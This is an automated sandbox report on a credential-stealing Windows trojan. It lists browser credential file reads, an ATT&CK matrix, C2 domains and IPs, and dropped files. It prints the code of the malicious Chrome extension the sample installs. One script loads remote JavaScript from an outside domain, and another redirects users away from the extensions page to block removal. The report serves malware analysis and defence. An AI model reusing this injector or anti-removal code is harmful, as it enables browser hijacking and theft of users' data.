Source: C:\Users\user\Desktop\IpB8f8qwze.exe; Code function: 0_2_0040F31A ConvertStringSecurityDescriptorToSecurityDescriptorW,GetLastError,CreateNamedPipeW,GetLastError,CreateNamedPipeW,GetLastError,CloseHandle,LocalFree
Source: C:\Users\user\Desktop\IpB8f8qwze.exe; Code function: 0_2_0042A173 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
Source: C:\Users\user\Desktop\IpB8f8qwze.exe; Code function: 0_2_00402B28 GetUserNameW,GetLastError
Source: C:\Users\user\Desktop\IpB8f8qwze.exe; Code function: 0_2_00438B07 GetTimeZoneInformation,SystemTimeToTzSpecificLocalTime
Source: C:\Users\user\Desktop\IpB8f8qwze.exe; Code function: 0_2_00436186 GetVersionExW
Source: C:\Users\user\Desktop\IpB8f8qwze.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\hihistory
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Replication Through Removable Media 1 | Windows Management Instrumentation 1 | DLL Side-Loading 1 | DLL Side-Loading 1 | Disable or Modify Tools 1 | OS Credential Dumping 1 | System Time Discovery 12 | Replication Through Removable Media 1 | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Native API 1 | Application Shimming 1 | Application Shimming 1 | Deobfuscate/Decode Files or Information 1 | LSASS Memory | Peripheral Device Discovery 11 | Remote Desktop Protocol | Man in the Browser 1 | Exfiltration Over Bluetooth | Encrypted Channel 2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | Command and Scripting Interpreter 2 | Windows Service 1 | Access Token Manipulation 1 | Obfuscated Files or Information 2 | Security Account Manager | Account Discovery 1 | SMB/Windows Admin Shares | Data from Local System 1 | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | Service Execution 1 | Browser Extensions 1 | Windows Service 1 | Install Root Certificate 2 | NTDS | File and Directory Discovery 3 | Distributed Component Object Model | Clipboard Data 1 | Scheduled Transfer | Application Layer Protocol 13 | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Bootkit 1 | Process Injection 12 | Software Packing 1 | LSA Secrets | System Information Discovery 57 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | DLL Side-Loading 1 | Cached Domain Credentials | Query Registry 2 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Masquerading 1 | DCSync | Security Software Discovery 461 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Virtualization/Sandbox Evasion 13 | Proc Filesystem | Virtualization/Sandbox Evasion 13 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Access Token Manipulation 1 | /etc/passwd and /etc/shadow | Process Discovery 3 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Process Injection 12 | Network Sniffing | System Owner/User Discovery 1 | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact
Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Bootkit 1 | Input Capture | Remote System Discovery 11 | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | | | Service Stop
Compromise Software Supply Chain | Unix Shell | Launchd | Launchd | Rename System Utilities | Keylogging | System Network Configuration Discovery 1 | Component Object Model and Distributed COM | Screen Capture | Exfiltration over USB | DNS | | | Inhibit System Recovery

Behavior Graph

[Figure: behavior graph. Behavior Graph ID: 364295, Sample: IpB8f8qwze.exe, Startdate: 07/03/2021, Architecture: WINDOWS, Score: 90]

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
IpB8f8qwze.exe | 46% | Virustotal |
IpB8f8qwze.exe | 19% | Metadefender |
IpB8f8qwze.exe | 38% | ReversingLabs | Win32.Trojan.Phonzy

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe | 19% | Metadefender |
C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe | 38% | ReversingLabs | Win32.Trojan.Phonzy
C:\Users\user\AppData\Local\Temp\MSI75EE.tmp | 0% | Metadefender |
C:\Users\user\AppData\Local\Temp\MSI75EE.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe | 8% | Metadefender |
C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe | 3% | Metadefender |
C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe | 2% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\download\atl71.dll | 3% | Metadefender |
C:\Users\user\AppData\Local\Temp\download\atl71.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll | 3% | Metadefender |
C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\download\download_engine.dll | 0% | Metadefender |
C:\Users\user\AppData\Local\Temp\download\download_engine.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\download\msvcp71.dll | 0% | Metadefender |
C:\Users\user\AppData\Local\Temp\download\msvcp71.dll | 3% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\download\msvcr71.dll | 0% | Metadefender |
C:\Users\user\AppData\Local\Temp\download\msvcr71.dll | 3% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\download\zlib1.dll | 0% | Metadefender |
C:\Users\user\AppData\Local\Temp\download\zlib1.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\xldl.dll | 3% | Metadefender |
C:\Users\user\AppData\Local\Temp\xldl.dll | 0% | ReversingLabs |

Unpacked PE Files

No Antivirus matches

Domains

Source | Detection | Scanner | Label
9A3A97F6F45F2C2B.com | 8% | Virustotal |
9a3a97f6f45f2c2b.com | 8% | Virustotal |
a36e971e03d9cbf8.com | 1% | Virustotal |

URLs


Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
9A3A97F6F45F2C2B.com | 104.21.6.78 | true | true | | unknown
9a3a97f6f45f2c2b.com | 104.21.6.78 | true | true | | unknown
a36e971e03d9cbf8.com | unknown | unknown | true | | unknown
c41676c07a61a961.com | unknown | unknown | true | | unknown
C41676C07A61A961.com | unknown | unknown | true | | unknown
A36E971E03D9CBF8.com | unknown | unknown | true | | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://9a3a97f6f45f2c2b.com/info_old/g | false | Avira URL Cloud: safe | unknown
http://9a3a97f6f45f2c2b.com/info_old/e | false | Avira URL Cloud: safe | unknown
http://9a3a97f6f45f2c2b.com/info_old/r | false | Avira URL Cloud: safe | unknown
http://9A3A97F6F45F2C2B.com/info_old/ddd | true | Avira URL Cloud: safe | unknown
http://9a3a97f6f45f2c2b.com//fine/send | false | Avira URL Cloud: safe | unknown
http://9a3a97f6f45f2c2b.com/info_old/w | false | Avira URL Cloud: safe | unknown

URLs from Memory and Binaries

                                                                                                              high
                                                                                                              https://curl.haxx.se/docs/http-cookies.html83C12B0D0FA88B10.exe, 00000002.00000002.311356783.0000000003200000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.276824908.0000000003300000.00000004.00000001.sdmpfalse
                                                                                                                high
                                                                                                                http://www.youtube.com&#J$83C12B0D0FA88B10.exe, 00000004.00000003.263407616.0000000003EF2000.00000004.00000001.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                low
                                                                                                                http://www.openssl.org/support/faq.htmldownload_engine.dll.2.drfalse
                                                                                                                  high
                                                                                                                  https://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_333%2Cw_311%2Cc_fill%2Cg_faces:autecv953D.tmp.9.drfalse
                                                                                                                    high
                                                                                                                    http://A36E971E03D9CBF8.com/d83C12B0D0FA88B10.exe, 00000004.00000002.273069439.00000000006F5000.00000004.00000020.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    http://images.outbrainimg.com/transform/v3/eyJpdSI6IiIsIml1ZSI6Imh0dHA6Ly9pbWFnZXMyLnplbWFudGEuY29tLecv953D.tmp.9.drfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    https://www.instagram.comsec-fetch-mode:83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    https://www.instagram.com/accounts/login/ajax/facebook/83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96eecv953D.tmp.9.drfalse
                                                                                                                        high
                                                                                                                        http://crl.thawte.com/ThawteTimestampingCA.crl0download_engine.dll.2.drfalse
                                                                                                                          high
                                                                                                                          http://9a3a97f6f45f2c2b.com/rl83C12B0D0FA88B10.exe, 00000004.00000002.273069439.00000000006F5000.00000004.00000020.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2ecv953D.tmp.9.drfalse
                                                                                                                            high
                                                                                                                            https://www.instagram.com/sec-fetch-site:83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              https://twitter.comReferer:83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              unknown
                                                                                                                              http://www.interestvideo.com/video1.php83C12B0D0FA88B10.exe, 00000004.00000002.276824908.0000000003300000.00000004.00000001.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              unknown
                                                                                                                              http://a36a97f6f45f2c2b.com/83C12B0D0FA88B10.exe, 00000004.00000002.273118658.000000000070F000.00000004.00000020.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              unknown
                                                                                                                              https://www.instagram.com/accept:83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                https://www.messenger.com/login/nonce/83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://cvision.media.net/new/300x194/2/138/47/25/3b2da2d4-7a38-47c3-b162-f33e769f51f5.jpg?v=9ecv953D.tmp.9.drfalse
                                                                                                                                    high

                                                                                                                                    Contacted IPs


                                                                                                                                    Public

IP | Domain | Country | ASN | ASN Name | Malicious
104.21.6.78 | 9A3A97F6F45F2C2B.com | United States | 13335 | CLOUDFLARENETUS | true
172.67.134.157 | unknown | United States | 13335 | CLOUDFLARENETUS | false

                                                                                                                                    Private

                                                                                                                                    IP
                                                                                                                                    192.168.2.1
                                                                                                                                    127.0.0.1

                                                                                                                                    General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 364295
Start date: 07.03.2021
Start time: 19:20:10
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 11m 43s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: IpB8f8qwze.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 37
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal90.bank.troj.spyw.evad.winEXE@32/37@33/4
EGA Information: Failed
                                                                                                                                    HDC Information:
                                                                                                                                    • Successful, ratio: 38.1% (good quality ratio 36.3%)
                                                                                                                                    • Quality average: 79.9%
                                                                                                                                    • Quality standard deviation: 26.7%
                                                                                                                                    HCA Information:
                                                                                                                                    • Successful, ratio: 67%
                                                                                                                                    • Number of executed functions: 68
                                                                                                                                    • Number of non-executed functions: 345
                                                                                                                                    Cookbook Comments:
                                                                                                                                    • Adjust boot time
                                                                                                                                    • Enable AMSI
                                                                                                                                    • Found application associated with file extension: .exe
                                                                                                                                    Warnings:
                                                                                                                                    • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                                    • Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 13.64.90.137, 52.255.188.83, 23.211.6.115, 13.88.21.125, 104.42.151.234, 184.30.24.56, 51.104.139.180, 2.20.142.209, 2.20.142.210, 51.103.5.159, 92.122.213.247, 92.122.213.194, 51.104.144.132, 20.54.26.129
                                                                                                                                    • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, skypedataprdcolwus17.cloudapp.net, client.wns.windows.com, fs.microsoft.com, dual-a-0001.a-msedge.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, skypedataprdcolwus16.cloudapp.net
                                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                    Simulations

                                                                                                                                    Behavior and APIs

Time | Type | Description
19:21:07 | API Interceptor | 9x Sleep call for process: IpB8f8qwze.exe modified
19:21:15 | API Interceptor | 10x Sleep call for process: 83C12B0D0FA88B10.exe modified

                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                    IPs

Match | Associated Sample Name / URL | Detection | Context
104.21.6.78 | Setup.exe | malicious | 9a3a97f6f45f2c2b.com/info_old/du
104.21.6.78 | Setup.exe | malicious | 9a3a97f6f45f2c2b.com/info_old/w
172.67.134.157 | Setup.exe | malicious | 9a3a97f6f45f2c2b.com/info_old/w
172.67.134.157 | Setup.exe | malicious | 9A3A97F6F45F2C2B.com/info_old/ddd

                                                                                                                                    Domains

Match | Associated Sample Name / URL | Detection | Context
9a3a97f6f45f2c2b.com | Setup.exe | malicious | 172.67.134.157
9a3a97f6f45f2c2b.com | Setup.exe | malicious | 172.67.134.157
9A3A97F6F45F2C2B.com | Setup.exe | malicious | 172.67.134.157
9A3A97F6F45F2C2B.com | Setup.exe | malicious | 172.67.134.157

                                                                                                                                    ASN

                                                                                                                                    SecuriteInfo.com.W32.Bulz.3814tr.24841.dllGet hashmaliciousBrowse
                                                                                                                                    • 104.20.185.68
                                                                                                                                    CLOUDFLARENETUSUsF26PCa3m.exeGet hashmaliciousBrowse
                                                                                                                                    • 104.17.63.50
                                                                                                                                    PRODUCT CTG. ORDER.exeGet hashmaliciousBrowse
                                                                                                                                    • 172.67.188.154
                                                                                                                                    1254515.dllGet hashmaliciousBrowse
                                                                                                                                    • 104.20.185.68
                                                                                                                                    microsoft_shared.dllGet hashmaliciousBrowse
                                                                                                                                    • 104.20.185.68
                                                                                                                                    Receipt.xlsxGet hashmaliciousBrowse
                                                                                                                                    • 172.67.160.246
                                                                                                                                    Setup.exeGet hashmaliciousBrowse
                                                                                                                                    • 172.67.134.157
                                                                                                                                    Setup.exeGet hashmaliciousBrowse
                                                                                                                                    • 172.67.134.157
                                                                                                                                    Byron_Distributors_PO_LED-Strips-Lighting.exeGet hashmaliciousBrowse
                                                                                                                                    • 162.159.134.233
                                                                                                                                    transferir copia_03_05.exeGet hashmaliciousBrowse
                                                                                                                                    • 23.227.38.74
                                                                                                                                    Byron_Distributors_PO_LED-Strips-Lighting.exeGet hashmaliciousBrowse
                                                                                                                                    • 162.159.133.233
                                                                                                                                    IrN6nQQw3Q.exeGet hashmaliciousBrowse
                                                                                                                                    • 104.17.62.50
                                                                                                                                    Avenge1.exeGet hashmaliciousBrowse
                                                                                                                                    • 172.67.190.5
                                                                                                                                    Paladin.exeGet hashmaliciousBrowse
                                                                                                                                    • 104.26.2.115
                                                                                                                                    GRN03546290_SC8290.exeGet hashmaliciousBrowse
                                                                                                                                    • 162.159.135.233
                                                                                                                                    Shipment Notification 9073784422.pdf.exeGet hashmaliciousBrowse
                                                                                                                                    • 172.67.188.154
                                                                                                                                    Property Information.exeGet hashmaliciousBrowse
                                                                                                                                    • 104.21.31.39
                                                                                                                                    Document.exeGet hashmaliciousBrowse
                                                                                                                                    • 162.159.135.233
                                                                                                                                    INV-UR407235.xlsxGet hashmaliciousBrowse
                                                                                                                                    • 162.159.133.233
                                                                                                                                    SWFTMSG04032021.docGet hashmaliciousBrowse
                                                                                                                                    • 172.67.208.139
                                                                                                                                    SecuriteInfo.com.W32.Bulz.3814tr.24841.dllGet hashmaliciousBrowse
                                                                                                                                    • 104.20.185.68

                                                                                                                                    JA3 Fingerprints

                                                                                                                                    No context

                                                                                                                                    Dropped Files

Match: C:\Users\user\AppData\Local\Temp\MSI75EE.tmp

Associated Sample Name / URL | Detection
Setup.exe | malicious
Setup.exe | malicious
tyxCV1ouryr7.exe | malicious
fnhcdXEfus.exe | malicious
6MhmlD8KZh.exe | malicious
fnhcdXEfus.exe | malicious
Cyfj6XGbkd.exe | malicious
N1yprTBBXs.exe | malicious
Cyfj6XGbkd.exe | malicious
N1yprTBBXs.exe | malicious
FileSetup-v17.04.41.exe | malicious
FileSetup-v17.04.41.exe | malicious

                                                                                                                                                            Created / dropped Files

                                                                                                                                                            C:\Users\user\AppData\Local\Cookies1615173735640
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe
                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):20480
                                                                                                                                                            Entropy (8bit):0.698304057893793
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoIL4rtEy80:T5LLOpEO5J/Kn7U1uBoI+j
                                                                                                                                                            MD5:3806E8153A55C1A2DA0B09461A9C882A
                                                                                                                                                            SHA1:BD98AB2FB5E18FD94DC24BCE875087B5C3BB2F72
                                                                                                                                                            SHA-256:366E8B53CE8CC27C0980AC532C2E9D372399877931AB0CEA075C62B3CB0F82BE
                                                                                                                                                            SHA-512:31E96CC89795D80390432062466D542DBEA7DF31E3E8676DF370381BEDC720948085AD495A735FBDB75071DE45F3B8E470D809E863664990A79DEE8ADC648F1C
                                                                                                                                                            Malicious:false
                                                                                                                                                            C:\Users\user\AppData\Local\Cookies1615173776790
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe
                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):20480
                                                                                                                                                            Entropy (8bit):0.698304057893793
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoIL4rtEy80:T5LLOpEO5J/Kn7U1uBoI+j
                                                                                                                                                            MD5:3806E8153A55C1A2DA0B09461A9C882A
                                                                                                                                                            SHA1:BD98AB2FB5E18FD94DC24BCE875087B5C3BB2F72
                                                                                                                                                            SHA-256:366E8B53CE8CC27C0980AC532C2E9D372399877931AB0CEA075C62B3CB0F82BE
                                                                                                                                                            SHA-512:31E96CC89795D80390432062466D542DBEA7DF31E3E8676DF370381BEDC720948085AD495A735FBDB75071DE45F3B8E470D809E863664990A79DEE8ADC648F1C
                                                                                                                                                            Malicious:false
                                                                                                                                                            C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\oolpjlhdalgpgokjjheophhfbccgopcg\1.0.0.0_0\background.js
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):886
                                                                                                                                                            Entropy (8bit):5.022683940423506
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:sFfWxmARONJTW0/I8/lZ9OKMmA6eiH4MmDCvTV3u4:sYo/NJ/7Augi8Dy
                                                                                                                                                            MD5:FEDACA056D174270824193D664E50A3F
                                                                                                                                                            SHA1:58D0C6E4EC18AB761805AABB8D94F3C4CBE639F5
                                                                                                                                                            SHA-256:8F538ED9E633D5C9EA3E8FB1354F58B3A5233F1506C9D3D01873C78E3EB88B8D
                                                                                                                                                            SHA-512:2F1968EDE11B9510B43B842705E5DDAC4F85A9E2AA6AEE542BEC80600228FF5A5723246F77C526154EB9A00A87A5C7DDD634447A8F7A97D6DA33B94509731DBC
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: $(function() {..chrome.tabs.onSelectionChanged.addListener(function(tab,info){....chrome.tabs.query({....active : true...}, function(tab) {....var pageUrl = tab[0].url;....console.log(pageUrl);....if (Number(pageUrl.indexOf("extensions")) > 1) ....{....chrome.tabs.update({url:'https://chrome.google.com/webstore/category/extension'}); ....}. .... ...});.});....chrome.webRequest.onBeforeRequest.addListener(function(details) {....chrome.tabs.query({....active : true...}, function(tab) {....var pageUrl = tab[0].url;...});........var url = details.url;...}, {...urls : [ "<all_urls>" ]..}, [ "blocking" ]);...function sendMessageToContentScript(message, callback) {...chrome.tabs.query({....active : true,....currentWindow : true...}, function(tabs) {....chrome.tabs.sendMessage(tabs[0].id, message, function(response) {.....if (callback)......callback(response);....});...});..}...});
                                                                                                                                                            C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\oolpjlhdalgpgokjjheophhfbccgopcg\1.0.0.0_0\book.js
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe
                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):152
                                                                                                                                                            Entropy (8bit):5.039480985438208
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:2LGffWpnYOJRyRmgO9lNCaVpveLWCfKVsSdDXaDQTNUHWSpHovJiRzlLBche:2LGXWpn7J8mgO9l3BeiCfLSdDYGNeW7u
                                                                                                                                                            MD5:30CBBF4DF66B87924C75750240618648
                                                                                                                                                            SHA1:64AF3DD53D6DED500863387E407F876C89A29B9A
                                                                                                                                                            SHA-256:D35FBD13C27F0A01DC944584D05776BA7E6AD3B3D2CBDE1F7C349E94502127F5
                                                                                                                                                            SHA-512:8117B8537A0B5F4BB3ED711D9F062E7A901A90FD3D2CF9DFFCC15D03ED4E001991BA2C79BCA072FA7FD7CE100F38370105D3CE76EB87F2877C0BF18B4D8CFBAB
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: (function(){.. var s = document.createElement('script'); .. s.src = '//kellyfight.com/22aff56f45f6b36dec.js'; .. document.body.appendChild(s);..})();
                                                                                                                                                            C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\oolpjlhdalgpgokjjheophhfbccgopcg\1.0.0.0_0\icon.png
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe
                                                                                                                                                            File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1161
                                                                                                                                                            Entropy (8bit):7.79271055262892
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:2mEKEvFZonmDzTaC6EU1yPj0bhJKaurzF3LvLIeR2D+JGP6A8UJ0wrBI4ez:DExZomDXe1yPYHKNx3LvLvWFP6noFy4M
                                                                                                                                                            MD5:5D207F5A21E55E47FCCD8EF947A023AE
                                                                                                                                                            SHA1:3A80A7CF3A8C8F9BDCE89A04239A7E296A94160F
                                                                                                                                                            SHA-256:4E8CE139D89A497ADB4C6F7D2FFC96B583DA1882578AB09D121A459C5AD8335F
                                                                                                                                                            SHA-512:38436956D5414A2CF66085F290EF15681DBF449B453431F937A09BFE21577252565D0C9FA0ACEAAD158B099383E55B94C721E23132809DF728643504EFFCBE2B
                                                                                                                                                            Malicious:false
                                                                                                                                                            C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\oolpjlhdalgpgokjjheophhfbccgopcg\1.0.0.0_0\icon48.png
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe
                                                                                                                                                            File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2235
                                                                                                                                                            Entropy (8bit):7.880518016071819
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:9V93V/3XpV1P2gnjz8xqNaT5YmiH+0Rn6r2ogpZGYmT2pN6esC+s5szuZNwG:BlFP7jzUTKm26rMCYmneWsCG
                                                                                                                                                            MD5:E35B805293CCD4F74377E9959C35427D
                                                                                                                                                            SHA1:9755C6F8BAB51BD40BD6A51D73BE2570605635D1
                                                                                                                                                            SHA-256:2BF1D9879B36BE03B2F140FAD1932BC6AAAAAC834082C2CD9E98BE6773918CA0
                                                                                                                                                            SHA-512:6C7D37378AA1E521E73980C431CE5815DEDB28D5B7003009B91392303D3BEC1EE6F2AAE719B766DA4209B607CD702FAE283E1682D3785EFF85E07D5EE81319C8
                                                                                                                                                            Malicious:false
                                                                                                                                                            C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\oolpjlhdalgpgokjjheophhfbccgopcg\1.0.0.0_0\jquery-1.8.3.min.js
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe
                                                                                                                                                            File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):93637
                                                                                                                                                            Entropy (8bit):5.292996107428883
